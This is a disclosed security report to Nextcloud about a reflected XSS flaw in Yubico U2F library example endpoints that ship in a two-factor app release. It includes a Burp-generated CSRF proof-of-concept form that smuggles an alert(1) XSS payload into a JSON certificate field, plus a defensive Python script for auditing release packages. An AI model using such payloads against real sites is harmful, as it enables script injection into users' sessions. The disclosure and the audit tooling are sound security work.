Reflected XSS in U2F plugin by shipping the example endpoints

Disclosed: 2017-03-22 11:42:48 By lukasreschke To nextcloud
Severity: High
Vulnerability Details
While running a [RIPS scan](https://www.ripstech.com/) against our [instrumentalized source code](https://github.com/nextcloud/php-static-scanner-instrumentalization) it noticed that the file `/apps/twofactor_u2f/vendor/yubico/u2flib-server/examples/localstorage/index.php` echoes user input.

I was first a tad confused because [the examples have been removed from our Git repository](https://github.com/nextcloud/twofactor_u2f/tree/3321e0dc84208adb623b6843f72e81782d9f2b6e/vendor/yubico/u2flib-server), but the release from apps.nextcloud.com ships with that file. So I suppose the Makefile is downloading the dependencies again.

While exploiting this is not entirely trivial due to some sanity checks in the code above, it is however possible; the following CSRF PoC will trigger a popup:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://10.211.55.7/stable9/apps/twofactor_u2f/vendor/yubico/u2flib-server/examples/localstorage/index.php" method="POST">
      <input type="hidden" name="doAuthenticate" value="&#123;&quot;signatureData&quot;&#58;&quot;AQAAABowRAIgMZL56nkLO7gs2OYoUW8RE3xAWLAvzroTiWO2T2PBb&#45;wCID6zjKjjxsqqG5NZ4upnT1xCeFmnDSefS&#95;TWHZWjoXgx&quot;&#44;&quot;clientData&quot;&#58;&quot;eyAiY2hhbGxlbmdlIjogIjFQX1l4TWpGVEhPcmNyQmlwUF8tLXRtVjA4SXNRUnVXaVlwZVZYVlNpVFUiLCAib3JpZ2luIjogImh0dHA6XC9cLzEwLjIxMS41NS43IiwgInR5cCI6ICJuYXZpZ2F0b3IuaWQuZ2V0QXNzZXJ0aW9uIiB9&quot;&#44;&quot;keyHandle&quot;&#58;&quot;9cgajEA4PWsnEbpgfnaxFBxMsiUNWo4GKbdk5PrdMn3c139bG3mXqLVw3VwpdcQzzPmVyGF6KBvFZsb2jpzdmg&quot;&#125;" />
      <input type="hidden" name="request" value="&#91;&#123;&quot;version&quot;&#58;&quot;U2F&#95;V2&quot;&#44;&quot;challenge&quot;&#58;&quot;1P&#95;YxMjFTHOrcrBipP&#95;&#45;&#45;tmV08IsQRuWiYpeVXVSiTU&quot;&#44;&quot;keyHandle&quot;&#58;&quot;9cgajEA4PWsnEbpgfnaxFBxMsiUNWo4GKbdk5PrdMn3c139bG3mXqLVw3VwpdcQzzPmVyGF6KBvFZsb2jpzdmg&quot;&#44;&quot;appId&quot;&#58;&quot;http&#58;&#47;&#47;10&#46;211&#46;55&#46;7&quot;&#125;&#93;" />
      <input type="hidden" name="registrations" value="&#91;&#123;&quot;keyHandle&quot;&#58;&quot;9cgajEA4PWsnEbpgfnaxFBxMsiUNWo4GKbdk5PrdMn3c139bG3mXqLVw3VwpdcQzzPmVyGF6KBvFZsb2jpzdmg&quot;&#44;&quot;publicKey&quot;&#58;&quot;BPtO8T0VluUL14FRKvEkZ5lP&#47;3W4F7er4WS87iYfrpoKj0Fjo&#43;M&#43;zAxNsuhYd&#43;3rYQFVPr4hflhOh3lMSZ605Fg&#61;&quot;&#44;&quot;certificate&quot;&#58;&quot;MIICLjCCARigAwIBAgIECmML&#92;&#47;zALBgkqhkiG9w0BAQswLjEsMCoGA1UEAxMjWXViaWNvIFUyRiBSb290IENBIFNlcmlhbCA0NTcyMDA2MzEwIBcNMTQwODAxMDAwMDAwWhgPMjA1MDA5MDQwMDAwMDBaMCkxJzAlBgNVBAMMHll1YmljbyBVMkYgRUUgU2VyaWFsIDE3NDI2MzI5NTBZMBMGByqGSM49AgEGCCqGSM49AwEHA0IABKQjZF26iyPtbNnl5IuTKs&#92;&#47;fRWTHVzHxz1IHRRBrSbqWD60PCqUJPe4zkIRFqBa4NnzdhVcS80nlZuY3ANQm0J&#43;jJjAkMCIGCSsGAQQBgsQKAgQVMS4zLjYuMS40LjEuNDE0ODIuMS4yMAsGCSqGSIb3DQEBCwOCAQEAZTmwMqHPxEjSB64Umwq2tGDKplAcEzrwmg6kgS8KPkJKXKSu9T1H6XBM9&#43;LAE9cN48oUirFFmDIlTbZRXU2Vm2qO9OdrSVFY&#43;qdbF9oti8CKAmPHuJZSW6ii7qNE59dHKUaP4lDYpnhRDqttWSUalh2LPDJQUpO9bsJPkgNZAhBUQMYZXL&#92;&#47;MQZLRYkX&#43;ld7llTNOX5u7n&#92;&#47;4Y5EMr&#43;lqOyVVC9lQ6JP6xoa9q6Zp9&#43;Y9ZmLCecrrcuH6&#43;pLDgAzPcc8qxhC2OR1B0ZSpI9RBgcT0KqnVE0tq1KEDeokPqF3MgmDRkJ&#43;&#43;&#92;&#47;a2pV0wAYfPC3tC57BtBdH&#92;&#47;UXEB8xZVFhtA&#61;&#61;wzh87&apos;&#45;alert&#40;1&#41;&#45;&apos;k50k8&quot;&#44;&quot;counter&quot;&#58;&#45;1&#125;&#93;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

This code is part of the [official Yubico PHP U2F library](https://github.com/Yubico/php-u2flib-server).
In a first step I'll coordinate with @christophwurst to remove this file from the release on apps.nextcloud.com, then I'll make sure to reach out to Yubico to get this resolved in their library.
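As an added example (not code from Nextcloud, Yubico or this report), a release-packaging audit in Python that flags the two things this report turns on: vendored example/test directories that made it into the shipped app, and PHP echo/print statements that emit request input without an escaping call. The directory list, the escaping-function list and the grep-level regexes are assumptions of this example, not a real static analyser.

```python
import os, re, tempfile
from pathlib import PurePosixPath

# Directory names that hold a library's examples/tests, never runtime code (assumed list).
NON_RUNTIME_DIRS = {"example", "examples", "test", "tests", "demo", "samples"}
# One echo/print statement up to its ';' (a ';' inside a string literal cuts it short).
ECHO_STMT_RE = re.compile(r"\b(?:echo|print)\b[^;]*;")
REQUEST_VAR_RE = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
# Calls we treat as "output was encoded" when they appear in the statement (assumed list).
ESCAPERS = ("htmlspecialchars(", "htmlentities(", "json_encode(", "intval(", "(int)")

def is_vendored_non_runtime(relpath: str) -> bool:
    """True when a file sits below vendor/ inside an examples/tests/demo directory."""
    parts = PurePosixPath(relpath).parts
    if "vendor" not in parts:
        return False
    dirs_below_vendor = parts[parts.index("vendor") + 1:-1]  # directories only
    return any(d.lower() in NON_RUNTIME_DIRS for d in dirs_below_vendor)

def reflecting_statements(php_source: str) -> list:
    """echo/print statements that emit a request superglobal with no escaping call."""
    hits = []
    for m in ECHO_STMT_RE.finditer(php_source):
        stmt = m.group(0)
        if REQUEST_VAR_RE.search(stmt) and not any(e in stmt for e in ESCAPERS):
            hits.append(stmt)
    return hits

def audit_tree(root: str) -> list:
    # Walk an unpacked app release; report every PHP file that hits either check.
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            with open(full, encoding="utf-8", errors="replace") as fh:
                echoes = reflecting_statements(fh.read())
            shipped = is_vendored_non_runtime(rel)
            if shipped or echoes:
                findings.append({"path": rel, "vendored_example": shipped, "reflects": echoes})
    return findings

if __name__ == "__main__":  # constructed sample tree; the PHP body is made up
    with tempfile.TemporaryDirectory() as root:
        ex = os.path.join(root, "vendor/yubico/u2flib-server/examples/localstorage")
        os.makedirs(ex)
        with open(os.path.join(ex, "index.php"), "w") as fh:
            fh.write('<?php echo "<p>" . $_POST["request"] . "</p>"; ?>')
        print(audit_tree(root))
```

Run it against an unpacked app tarball before publishing; a hit on `vendored_example` alone is already a packaging bug, whether or not the file reflects input.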
Report Stats
  • Report ID: 192786
  • State: Closed
  • Substate: resolved
  • Upvotes: 10